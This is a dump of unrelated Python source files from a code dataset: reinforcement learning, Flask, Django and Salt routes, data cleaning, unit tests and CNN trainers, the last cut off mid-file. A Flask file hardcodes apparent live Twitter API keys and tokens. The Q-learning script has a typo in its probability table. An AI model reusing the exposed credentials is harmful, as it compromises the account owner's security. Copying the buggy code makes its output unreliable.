1.25*10**(26)])\n\n#pl.savefig('Partition_Coefficent.png')\npl.show()\n\n","sub_path":"python_scripts_from_jchopkin/chem_pot.py","file_name":"chem_pot.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"45620861","text":"import numpy as np\r\n\r\ntransition_probabilities = [ # shape=[s, a, s']\r\n [[0.7, 0, 3, 0.0], [1.0, 0.0, 0.0], [0.8, 0.2, 0.0]],\r\n [[0.0, 1.0, 0.0], None, [0.0, 0.0, 1.0]],\r\n [None, [0.8, 0.1, 0.1], None]]\r\n\r\nrewards = [ # shape=[s, a, s']\r\n [[+10, 0, 0], [0, 0, 0], [0, 0, 0]],\r\n [[0, 0, 0], [0, 0, 0], [0, 0, -50]],\r\n [[0, 0, 0], [+40, 0, 0], [0, 0, 0]]]\r\n\r\npossible_actions = [[0, 1, 2], [0, 2], [1]]\r\n\r\nQ_values = np.full((3, 3), np.inf) # -np.inf for imposible possible_actions\r\nfor state, actions, in enumerate(possible_actions):\r\n Q_values[state, actions] = 0.0 # for all possible actions\r\n\r\ngamma = 0.90 # the discount factor\r\n\r\nhistory1 = [] # Not shown in the book (for the figure below)\r\nfor iteration in range(50):\r\n Q_prev = Q_values.copy()\r\n history1.append(Q_prev) # Not shown\r\n for s in range(3):\r\n for a in possible_actions[s]:\r\n Q_values[s, a] = np.sum([\r\n transition_probabilities[s][a][sp]\r\n * (rewards[s][a][sp] + gamma * np.max(Q_prev[sp]))\r\n for sp in range(3)])\r\n\r\nhistory1 = np.array(history1) # Not shown\r\n\r\nprint(Q_values)\r\n","sub_path":"Q-Learning/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551488079","text":"import unittest\n\nfrom leetcode.solutions.problem_1108 import Solution\n\n\nclass TestSolution(unittest.TestCase):\n def test_defangIPaddr(self):\n test_data = [\n ('1.1.1.1', '1[.]1[.]1[.]1'),\n ('255.100.50.0', '255[.]100[.]50[.]0'),\n ]\n solution = Solution()\n for address, expected in test_data:\n with self.subTest(address=address, expected=expected):\n self.assertEqual(solution.defangIPaddr(address), expected)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/solutions/test_problem_1108.py","file_name":"test_problem_1108.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"387863914","text":"\"\"\"\r\nQuick program to rmove crimes without positional data\r\n\"\"\"\r\nimport utm\r\nimport numpy\r\nfrom decimal import Decimal\r\n\r\nsource_file = open('Crimes_with_location.csv', 'r')\r\n\r\ncrime_destination = open('Crimes_with_location_b_and_e_gps.csv', 'w')\r\n\r\nseperator = ','\r\n\r\n# Read first line\r\nline = source_file.readline()\r\n\r\n# Write to the two files\r\ncrime_destination.write(line)\r\n\r\n# Read first line of actual data\r\nline = source_file.readline()\r\ncount = 1\r\n\r\n\r\n\r\nwhile line:\r\n split_line = line.split(',')\r\n new_line = []\r\n \r\n if (split_line[0])[0:5] == 'Break':\r\n \r\n \r\n crime_destination.write(line)\r\n \r\n\r\n # continue reading lines till done\r\n line = source_file.readline()\r\n\r\n # Print update every 10000 rows proccessed\r\n if count % 10000 == 0:\r\n print(count)\r\n \r\n count += 1\r\n\r\n# Close all files\r\nsource_file.close()\r\ncrime_destination.close()\r\n\r\n\r\n## >>> utm.to_latlon(494285.25,5453254.66, 10, 'U')\r\n","sub_path":"Quick Python Utility Programs/sort crimes - only b and e and gps and date.py","file_name":"sort crimes - only b and e and gps and date.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507585402","text":"#!/usr/bin/env python3\n#import json\nimport io\nimport glob\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom Tweet import Tweet\nfrom CryptoData import CryptoData\nfrom datetime import datetime, timedelta\n# from tqdm import tnrange, tqdm_notebook, tqdm\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\nif __name__ == \"__main__\":\n # Cargar Datos\n tws = Tweet()\n tws.csv_tweet(tws.tweet(limit_tweet=100)) # gen csv in tmp/\n dfs = []\n dfs.append(pd.read_csv(tws.file_path))\n tweets = pd.concat(dfs)\n\n print('Tweets antes de soltar los duplicados.', tweets.shape)\n duplicates_removed = tweets.shape[0]\n tweets = tweets.drop_duplicates(subset=['Id'])\n duplicates_removed -= tweets.shape[0]\n print('Tweets después de soltar duplicados', tweets.shape)\n print('Duplicados eliminados ', duplicates_removed)\n\n # Display dataframes head\n # print(tweets.head(2))\n\n crd = CryptoData()\n crd_list = crd.csv_to_list()\n\n dfs = []\n dfs.append(pd.DataFrame(crd_list[1:], columns=crd_list[:1].pop()))\n crypto_pesos = pd.concat(dfs)\n crypto_pesos = crypto_pesos.sort_values(by=['Fecha'])\n\n print('bitcoin shape before droping duplicates', crypto_pesos.shape)\n duplicates_removed = crypto_pesos.shape[0]\n crypto_pesos = crypto_pesos.drop_duplicates(subset=['Fecha'])\n print('bitcoin shape after droping duplicates', crypto_pesos.shape)\n duplicates_removed -= crypto_pesos.shape[0]\n print('duplicates removed', duplicates_removed)\n\n tweets['CreatedAt'] = pd.to_datetime(tweets['CreatedAt'])\n tweets.index = tweets['CreatedAt']\n\n tweets_grouped = tweets.groupby(pd.Grouper(freq='1h'))['score'].sum()\n\n crypto_pesos['Fecha'] = pd.to_datetime(crypto_pesos['Fecha'], unit='s')\n crypto_pesos.index = crypto_pesos['Fecha']\n\n crypto_pesos_grouped = crypto_pesos.groupby(pd.Grouper(freq='1h'))['Cierre'].mean()\n\n fig, ax1 = plt.subplots(figsize=(20,10))\n ax1.set_title(\"Crypto currency evolution compared to twitter sentiment\", fontsize=18)\n ax1.tick_params(labelsize=14)\n ax2 = ax1.twinx()\n ax1.plot_date(tweets_grouped.index, tweets_grouped, 'g-')\n ax2.plot_date(crypto_pesos_grouped.index, crypto_pesos_grouped, 'b-')\n\n ax1.set_ylabel(\"Sentiment\", color='g', fontsize=16)\n ax2.set_ylabel(\"BAT [$]\", color='b', fontsize=16)\n plt.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"122483349","text":"import unittest\n\nimport ConfigParser\n\nfrom spinn_front_end_common.interface.abstract_spinnaker_base \\\n import AbstractSpinnakerBase\nfrom spinn_front_end_common.utilities.utility_objs.executable_finder \\\n import ExecutableFinder\nfrom spinn_front_end_common.utilities import globals_variables\nfrom spinn_front_end_common.utilities.failed_state import FailedState\n\n\nclass Close_Once(object):\n\n __slots__ = (\"closed\")\n\n def __init__(self):\n self.closed = False\n\n def close(self):\n if self.closed:\n raise Exception(\"Close called twice\")\n else:\n self.closed = True\n\n\nclass TestSpinnakerMainInterface(unittest.TestCase):\n\n def setUp(self):\n globals_variables.set_failed_state(FailedState())\n\n def default_config(self):\n config = ConfigParser.RawConfigParser()\n config.add_section(\"Mapping\")\n config.set(\"Mapping\", \"extra_xmls_paths\", value=\"\")\n config.add_section(\"Machine\")\n config.set(\"Machine\", \"appID\", value=\"1\")\n config.set(\"Machine\", \"virtual_board\", value=\"False\")\n config.add_section(\"Reports\")\n config.set(\"Reports\", \"defaultReportFilePath\", value=\"DEFAULT\")\n config.set(\"Reports\", \"max_reports_kept\", value=\"1\")\n config.set(\"Reports\", \"max_application_binaries_kept\", value=\"1\")\n config.set(\"Reports\", \"defaultApplicationDataFilePath\",\n value=\"DEFAULT\")\n config.set(\"Reports\", \"writeAlgorithmTimings\", value=\"False\")\n config.set(\"Reports\", \"display_algorithm_timings\", value=\"False\")\n config.set(\"Reports\", \"provenance_format\", value=\"xml\")\n config.add_section(\"SpecExecution\")\n config.set(\"SpecExecution\", \"specExecOnHost\", value=\"True\")\n return config\n\n def test_min_init(self):\n AbstractSpinnakerBase(\n self.default_config(), ExecutableFinder())\n\n def test_stop_init(self):\n interface = AbstractSpinnakerBase(\n self.default_config(), ExecutableFinder())\n mock_contoller = Close_Once()\n interface._machine_allocation_controller = mock_contoller\n self.assertFalse(mock_contoller.closed)\n interface.stop(turn_off_machine=False, clear_routing_tables=False,\n clear_tags=False)\n self.assertTrue(mock_contoller.closed)\n interface.stop(turn_off_machine=False, clear_routing_tables=False,\n clear_tags=False)\n\n def test_temp_defaultApplicationDataFilePath(self):\n config = self.default_config()\n config.set(\"Reports\", \"defaultApplicationDataFilePath\", value=\"TEMP\")\n AbstractSpinnakerBase(\n config, ExecutableFinder())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"unittests/test_spinnaker_main_interface.py","file_name":"test_spinnaker_main_interface.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"370353421","text":"from flask import Flask\nfrom flask import request,jsonify\nfrom flask_cors import CORS\nfrom PoliticalClassifier import PoliticalClassifier\nimport twitter\napi = twitter.Api(consumer_key='baO03vmpkrNUB23IwjLlShaDT',consumer_secret='7KjZRDr1Wur07EWJ9W6xXBLqXIKWP6AiIabdRb49EwXE94vIFF',access_token_key='796258490306076677-VuG0bhaok1lSIKvzr271CaJsvc5tl9B',access_token_secret='GUKvcG5cVa4n4Ju0IJlPzzP6A6L9vClvzhedToDeF5qqM')\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\ncl = PoliticalClassifier() \n\n@app.route('/',methods=['POST'])\ndef get_predictions():\n text = request.get_json()['text']\n print(text)\n result = { \"predictions\" : [cl.predict(x) for x in text] }\n return jsonify(result)\n\n@app.route('/user',methods=['POST'])\ndef get_user_prediction():\n username = request.get_json()['username']\n t=api.GetUserTimeline(screen_name=username,count=100)\n tweets=[i.AsDict()['text'] for i in t]\n print(tweets)\n predicts=[cl.predict(x) for x in tweets]\n result = { \"result\": sum(predicts)/len(predicts)}\n return jsonify(result)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=443, ssl_context=('/etc/letsencrypt/live/www.ntumods.com/fullchain.pem', '/etc/letsencrypt/live/www.ntumods.com/privkey.pem'))\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"609939685","text":"\"\"\"librarium URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom jwt_auth import views as jwt_auth_views\n\nfrom app.views import entries_list, AllResourcesView, ResourceView, ContentView, PreviewView, PostsView, TestToken\n\nurlpatterns = [\n path('admin', admin.site.urls),\n path('entries', entries_list),\n path('resources', AllResourcesView.as_view()),\n path('resource/', ResourceView.as_view()),\n path('content//full', ContentView.as_view()),\n path('content//preview', PreviewView.as_view()),\n path('aa', PostsView.as_view()),\n path('api-token-test', TestToken.as_view()),\n path('api-token-update', jwt_auth_views.refresh_jwt_token),\n path('api-token-auth', jwt_auth_views.jwt_token),\n]\n","sub_path":"librarium/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"122876149","text":"import click, os, sys, shutil\nfrom boiler.cli.colors import *\nfrom click import echo\n\n\n# -----------------------------------------------------------------------------\n# Group setup\n# -----------------------------------------------------------------------------\n\n\n@click.group(help=yellow('Welcome to project console!'))\ndef cli():\n pass\n\n\n# -----------------------------------------------------------------------------\n# Commands\n# -----------------------------------------------------------------------------\n\n@cli.command(name='run')\n@click.option('--host', '-h', default='0.0.0.0', help='Bind to')\n@click.option('--port', '-p', default=5000, help='Listen on port')\n@click.option('--reload/--no-reload', default=True, help='Reload on change?')\n@click.option('--debug/--no-debug', default=True, help='Use debugger?')\ndef run(host='0.0.0.0', port=5000, reload=True, debug=True):\n \"\"\" Run development server \"\"\"\n from werkzeug.serving import run_simple\n from boiler.bootstrap import create_middleware\n from config.config import DevConfig\n\n app = create_middleware(config=DevConfig())\n return run_simple(\n hostname=host,\n port=port,\n application=app,\n use_reloader=reload,\n use_debugger=debug,\n )\n\n\n@cli.command(name='shell')\ndef shell():\n \"\"\" Start application-aware shell \"\"\"\n from boiler.bootstrap import create_middleware\n from config.config import DevConfig\n from config.apps import apps\n\n # mount apps\n context = dict()\n middleware = create_middleware(config=DevConfig())\n context['middleware'] = middleware.wsgi_app\n default = apps['default_app']\n context['apps'] = dict()\n context['apps'][default] = middleware.wsgi_app.app\n\n # for app in middleware.wsgi_app.mounts:\n for mount, app in middleware.wsgi_app.mounts.items():\n for name, cfg in apps['apps'].items():\n if mount == cfg['base_url']:\n context['apps'][name] = app\n\n # and push app context\n app_context = middleware.app_context()\n app_context.push()\n\n # and run\n try:\n from IPython import embed\n embed(user_ns=context)\n except ImportError:\n import code\n code.interact(local=context)\n\n\n# -----------------------------------------------------------------------------\n# Testing commands\n# -----------------------------------------------------------------------------\n\n@cli.command(name='test',context_settings=dict(ignore_unknown_options=True))\n@click.argument('nose_argsuments', nargs=-1, type=click.UNPROCESSED)\ndef test(nose_argsuments):\n \"\"\" Run application tests \"\"\"\n from nose import run\n params = ['__main__', '-c', 'nose.ini']\n params.extend(nose_argsuments)\n run(argv=params)\n\n\n\n\n","sub_path":"boiler/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"150665165","text":"MENU = {\n 'sandwich': 10,\n 'tea': 7,\n 'salad': 9\n}\n\n\ndef restaurant():\n total = 0\n order = input(\"What would you like to order? \").strip()\n valid = True\n while valid:\n if not order:\n valid = False\n elif order not in MENU:\n order = input(\"You did not enter an item on the menu, please order again > \").strip()\n else:\n total += MENU[order]\n order = input(\"What else would you like to order? \").strip()\n return print(f\"Your total is: ${round(total, 2)}\")\n\n\nrestaurant()\n ","sub_path":"20-learning/03-python-workout/pw14-restaurant.py","file_name":"pw14-restaurant.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"618084728","text":"from __future__ import unicode_literals\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.db import models\nfrom usersys.models import UserBase\nfrom demandsys.models import ProductDemand\nfrom coresys.models import CoreDistributionMethod, CorePaymentMethod\nfrom .invite_enum import i_status_choice\nfrom demandsys.models.demand_enum import unit_choice\n\n\nclass InviteInfo(models.Model):\n uid_s = models.ForeignKey(\n UserBase,\n on_delete=models.CASCADE,\n related_name=\"user_invite_src\",\n db_index=True,\n verbose_name=_(\"inviter\")\n )\n uid_t = models.ForeignKey(\n UserBase,\n on_delete=models.CASCADE,\n related_name=\"user_invite_dst\",\n db_index=True,\n verbose_name=_(\"invitee\")\n )\n dmid_s = models.ForeignKey(\n ProductDemand,\n on_delete=models.PROTECT, # Do not allow?\n related_name=\"demand_invite_src\",\n verbose_name=_(\"inviter's demand\"),\n null=True,\n blank=True\n )\n dmid_t = models.ForeignKey(\n ProductDemand,\n on_delete=models.PROTECT,\n related_name=\"demand_invite_dst\",\n verbose_name=_(\"invitee's demand\")\n )\n quantity = models.FloatField()\n price = models.FloatField()\n unit = models.IntegerField(max_length=unit_choice.MAX_LENGTH, choices=unit_choice.choice)\n pmid = models.ForeignKey(CorePaymentMethod, on_delete=models.PROTECT, verbose_name=_(\"Pay method\"))\n disid = models.ForeignKey(CoreDistributionMethod, on_delete=models.PROTECT, verbose_name=_(\"Distribution Method\"))\n dis_duration = models.IntegerField(verbose_name=_(\"Distribution duration\"))\n i_status = models.IntegerField(_(\"Invite status\"), choices=i_status_choice.choice)\n reason = models.TextField(null=True, blank=True)\n\n def __unicode__(self):\n return str(self.uid_s) + \" v.s. \" + str(self.uid_t)\n","sub_path":"invitesys/models/invite.py","file_name":"invite.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"112452145","text":"\"\"\"saltshaker URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.8/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import url\n\nimport labs_dbatools\nimport labs_sqlup\n\nurlpatterns = [\n url(r'execSQL_labs/(.+)/$', labs_dbatools.execSQL_labs),\n url(r'getInnerFile/(.+)/$',labs_dbatools.getFile),\n url(r'changeFile/(.+)/$', labs_dbatools.changeFile),\n url(r'showFile/(.+)/$', labs_dbatools.showFile),\n url(r'^dll_uppage/sql/(.+)/$', labs_dbatools.sqlUppage, name='sqlUppage'),\n url(r'^publish_otherdoapply/sql/$', labs_sqlup.publish_otherdoapply, name='publish_otherdoapply'),\n url(r'^publish_otherapply/sql/$', labs_sqlup.publish_otherapply, name='publish_otherapply'),\n url(r'^getbeltline/$', labs_dbatools.getBeltline, name='getBeltline'),\n url(r'^getdbname/(.+)/$', labs_dbatools.getDbname, name='getDatabase'),\n url(r'^getsubdbname/(.+)/$', labs_dbatools.getSubDbname, name='getSubDbname'),\n url(r'^getexeplan/(.+)/$', labs_dbatools.execPlan, name='execPlan'),\n #url(r'^db_space_info/(.*)/(.*)/(.*)/$', views.char_tables_info),\n]\n","sub_path":"labs_dbatools/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516054126","text":"dic = {}\n\nwith open(\"states.txt\") as file:\n\tfor line in file:\n\t\tmylist = line.split(\",\")\n\t\tdic[mylist[1]] = mylist[0]\n\ndef bluesclues(abbrev):\n\treturn dic[abbrev]\n\n\ndef bluesbooze(state):\n\tfor abbrev in dic.keys():\n\t\tif dic[abbrev] == state:\n\t\t\treturn abbrev","sub_path":"asst1/bluesclues.py","file_name":"bluesclues.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"103235429","text":"from typing import Type, Callable, Sequence\n\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom ignite.utils import convert_tensor\n\n\nclass TransformedDataset(Dataset):\n\n def __init__(self, ds: Type[Dataset], transform_fn: Callable):\n assert isinstance(ds, Dataset)\n assert callable(transform_fn)\n self.ds = ds\n self.transform_fn = transform_fn\n\n def __len__(self):\n return len(self.ds)\n\n def __getitem__(self, index):\n dp = self.ds[index]\n return self.transform_fn(**dp)\n\n\ndef denormalize(t: Type[torch.Tensor],\n mean: Sequence,\n std: Sequence,\n max_pixel_value: float = 255.0):\n assert isinstance(t, torch.Tensor), \"{}\".format(type(t))\n assert t.ndim == 3\n assert len(mean) == len(std) == t.shape[0], \"{} vs {} vs {}\".format(len(mean), len(std), t.shape[0])\n d = t.device\n mean = torch.tensor(mean, device=d).unsqueeze(-1).unsqueeze(-1)\n std = torch.tensor(std, device=d).unsqueeze(-1).unsqueeze(-1)\n tensor = std * t + mean\n tensor *= max_pixel_value\n return tensor\n\n\ndef prepare_batch_fp32(batch, device, non_blocking):\n x, y = batch['image'], batch['mask']\n x = convert_tensor(x, device, non_blocking=non_blocking)\n y = convert_tensor(y, device, non_blocking=non_blocking).long()\n return x, y\n\n\ndef inference_prepare_batch_f32(batch, device, non_blocking):\n x = batch['image']\n y = batch['mask'] if 'mask' in batch else None\n meta = batch['meta'] if 'meta' in batch else None\n\n x = convert_tensor(x, device, non_blocking=non_blocking)\n if y is not None:\n y = convert_tensor(y, device, non_blocking=non_blocking).long()\n return x, y, meta\n","sub_path":"code/dataflow/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"345436147","text":"import sys\r\n\r\nif len(sys.argv) != 3:\r\n print(\"Usage: train_png_model.py [fake img directory] [real img directory]\")\r\n sys.exit()\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom PIL import Image\r\nfrom skimage.feature import greycomatrix \r\nfrom tensorflow.keras import datasets, layers, models\r\nfrom keras.optimizers import Adam\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport tensorflow as tf\r\n\r\n\r\n###### Helper functions ######\r\n\r\n# Gets Co-occurrence matrices of image in the RGB colour channels, outputs tensor of size 3*256*256\r\ndef getCoMatrices(img):\r\n b,g,r = cv2.split(img)\r\n distance = 1 # distance offset to detect pixel pairs\r\n angle = 0 # angle offset to detect distance pairs (0 is to the right, np.pi/2 is up)\r\n rcomatrix = greycomatrix(r, [distance], [angle])\r\n gcomatrix = greycomatrix(g, [distance], [angle])\r\n bcomatrix = greycomatrix(b, [distance], [angle])\r\n tensor = tf.constant([rcomatrix[:,:,0,0], gcomatrix[:,:,0,0], bcomatrix[:,:,0,0]])\r\n tensor = tf.reshape(tensor, [256, 256, 3])\r\n return tensor\r\n\r\n\r\n# Generates the dataset\r\ndef genDs(augmentedFakeFolder, augmentedRealFolder):\r\n trainingDs = []\r\n trainingLabels = []\r\n valDs = []\r\n valLabels = []\r\n split = 0.8 # used to split data in terms of testing and validation\r\n count = 0\r\n fakeLabel = int(0)\r\n realLabel = int(1)\r\n dirsFake = os.listdir(augmentedFakeFolder)\r\n dirsReal = os.listdir(augmentedRealFolder)\r\n imageToProcess = len(dirsFake) # Number of images in real and fake folders must be EQUAL\r\n maxFake = int(imageToProcess*split)\r\n maxReal = int(imageToProcess*split)\r\n\r\n # takes fake image in folder and puts into training_dataset\r\n # Once specified max limit hit for training_dataset puts the rest in the validation_dataset \r\n for image in dirsFake:\r\n img = cv2.imread(os.path.join(augmentedFakeFolder, image), cv2.IMREAD_COLOR)\r\n if count > imageToProcess - 1:\r\n break\r\n if count > maxFake - 1:\r\n valDs.append(getCoMatrices(img))\r\n innerList = []\r\n innerList.append(fakeLabel)\r\n valLabels.append(innerList)\r\n count+=1\r\n continue\r\n trainingDs.append(getCoMatrices(img))\r\n otherInnerList = []\r\n otherInnerList.append(fakeLabel)\r\n trainingLabels.append(otherInnerList)\r\n count += 1 \r\n\r\n count = 0\r\n\r\n # takes real image in folder and puts into training_dataset\r\n # Once specified max limit hit for training_dataset puts the rest in the validation_dataset \r\n for image in dirsReal:\r\n img = cv2.imread(os.path.join(augmentedRealFolder, image), cv2.IMREAD_COLOR)\r\n if count > imageToProcess - 1:\r\n break\r\n if count > maxReal - 1:\r\n valDs.append(getCoMatrices(img))\r\n innerList = []\r\n innerList.append(realLabel)\r\n valLabels.append(innerList)\r\n count += 1\r\n continue\r\n trainingDs.append(getCoMatrices(img))\r\n otherInnerList = []\r\n otherInnerList.append(realLabel)\r\n trainingLabels.append(otherInnerList)\r\n count += 1\r\n\r\n trainingLabels = np.asarray(trainingLabels)\r\n valLabels = np.asarray(valLabels)\r\n trainingDs = tf.stack(trainingDs)\r\n valDs = tf.stack(valDs)\r\n\r\n return trainingDs, trainingLabels, valDs, valLabels\r\n\r\n\r\n# Creates the layers for the model to train\r\ndef trainModel():\r\n model = models.Sequential() \r\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(256, 256, 3)))\r\n model.add(layers.Conv2D(32, (5, 5)))\r\n model.add(layers.MaxPooling2D((2, 2)))\r\n model.add(layers.Dropout(0.1))\r\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\n model.add(layers.Conv2D(64, (5, 5)))\r\n model.add(layers.MaxPooling2D((2, 2)))\r\n model.add(layers.Dropout(0.2))\r\n model.add(layers.Conv2D(128, (3, 3), activation='relu'))\r\n model.add(layers.Conv2D(128, (5, 5)))\r\n model.add(layers.MaxPooling2D((2, 2)))\r\n model.add(layers.Dropout(0.25))\r\n model.add(layers.Flatten())\r\n model.add(layers.Dense(256))\r\n model.add(layers.Dropout(0.5))\r\n model.add(layers.Dense(256))\r\n \r\n model.compile(optimizer=Adam(lr=0.000075),\r\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n metrics=['accuracy'])\r\n return model\r\n\r\n\r\n# Trains the model and plots its accuracy\r\ndef plotAccuracy(model, train_matrices, train_labels, test_matrices, test_labels):\r\n data = model.fit(train_matrices, train_labels, epochs=5, batch_size=40,\r\n validation_data=(test_matrices, test_labels))\r\n \r\n plt.plot(data.history['loss'])\r\n plt.plot(data.history['val_loss'])\r\n plt.title('Model Loss')\r\n plt.ylabel('Loss')\r\n plt.ylim([0, 1])\r\n plt.xlabel('Epoch')\r\n plt.legend(['train loss', 'val loss'], loc='upper left')\r\n plt.show()\r\n\r\n\r\n plt.plot(data.history['accuracy'], label='accuracy')\r\n plt.plot(data.history['val_accuracy'], label = 'val_accuracy')\r\n plt.title('Model Accuracy')\r\n plt.xlabel('Epoch') # Epoch is the iteration in the Neural Network\r\n plt.ylabel('Accuracy')\r\n plt.ylim([0.5, 1])\r\n plt.legend(loc='lower right')\r\n test_loss, test_acc = model.evaluate(test_matrices, test_labels, verbose=2);\r\n plt.show()\r\n print('Accuracy is ' + str(test_acc * 100) + '%')\r\n\r\n\r\n\r\n###### Main Script ######\r\n\r\n# Generate dataset from images\r\ntds, tlbl, vds, vlbl = genDs(sys.argv[1], sys.argv[2])\r\n\r\n# Train the model\r\nmodelCNN = trainModel()\r\nmodelCNN.summary()\r\nplotAccuracy(modelCNN, tds, tlbl, vds, vlbl)\r\n\r\n# Save model to file\r\nmodelCNN.save_weights('ImageDetectmodel_weights.h5')\r\nmodelCNN.save('ImageDetectmodel.h5')\r\n","sub_path":"train_jpg_model.py","file_name":"train_jpg_model.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"484597722","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport READ_MNIST\n\n\n# training iterations\nTRAINING_ITER_NUM = 1000\n\nBATCH_SIZE = 128\n\n# test iterations\nTEST_ITER_NUM = 10\n\n# data and labels\ntrain_images = READ_MNIST.load_train_images()\ntrain_labels = READ_MNIST.load_train_labels()\ntest_images = READ_MNIST.load_test_images()\ntest_labels = READ_MNIST.load_test_labels()\n\n\n# function to build a conv layer\ndef conv2d(x, w, b, activation_function=tf.nn.relu):\n return activation_function(tf.nn.conv2d(x, w, strides=[1, 1, 1, 1], padding='SAME') + b)\n\n\n# function to build a max pool layer\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\n\n# function to build a fc layer\ndef fc(x, w, b, activation_function=tf.nn.relu):\n return activation_function(tf.matmul(x, w) + b)\n\n\nif __name__ == '__main__':\n # define placeholder for input data x and true output data y\n # None means the number of input is not fixed, you can input many x and y\n x_original_data = tf.placeholder(tf.float32, [None, 784])\n y_true = tf.placeholder(tf.float32, [None, 10])\n\n # data is [None, 784], we have to reshape it to [None, 28, 28]\n # the 1 in [None, 28, 28, 1] means the channel of image is 1\n # the gray image's channel is 1, RGB image's channel is 3, RGBA image's channel image is 4\n x_input = tf.reshape(x_original_data, [-1, 28, 28, 1])\n\n '''\n define the network\n 28*28*1 image -> 32 conv core with 5*5*1 shape (max_pool) -> 64 conv core with 5*5*32 shape (max_pool)\n -> fc 1024 -> fc 10 output\n '''\n\n # 32 conv cores, shape is 5*5*1\n w_conv1 = tf.Variable(tf.random_normal([5, 5, 1, 32]))\n b_conv1 = tf.Variable(tf.random_normal([32]))\n layer_conv1 = conv2d(x_input, w_conv1, b_conv1, activation_function=tf.nn.relu)\n layer_pool1 = max_pool_2x2(layer_conv1)\n\n # 64 conv cores, shape is 5*5*1\n w_conv2 = tf.Variable(tf.random_normal([5, 5, 32, 64]))\n b_conv2 = tf.Variable(tf.random_normal([64]))\n layer_conv2 = conv2d(layer_pool1, w_conv2, b_conv2, activation_function=tf.nn.relu)\n layer_pool2 = max_pool_2x2(layer_conv2)\n\n # flat the layer 2\n layer_pool2_flat = tf.reshape(layer_pool2, [-1, 7*7*64])\n\n # full connected layer,\n w_fc1 = tf.Variable(tf.random_normal([7*7*64, 1024]))\n b_fc1 = b_conv1 = tf.Variable(tf.random_normal([1024]))\n layer_fc1 = fc(layer_pool2_flat, w_fc1, b_fc1, activation_function=tf.nn.relu)\n\n # output layer\n w_fc2 = tf.Variable(tf.random_normal([1024, 10]))\n b_fc2 = tf.Variable(tf.random_normal([10]))\n predict = tf.matmul(layer_fc1, w_fc2) + b_fc2\n\n # define the loss function\n entropy = tf.nn.softmax_cross_entropy_with_logits(logits=predict, labels=y_true)\n loss_function = tf.reduce_mean(entropy)\n\n # define the 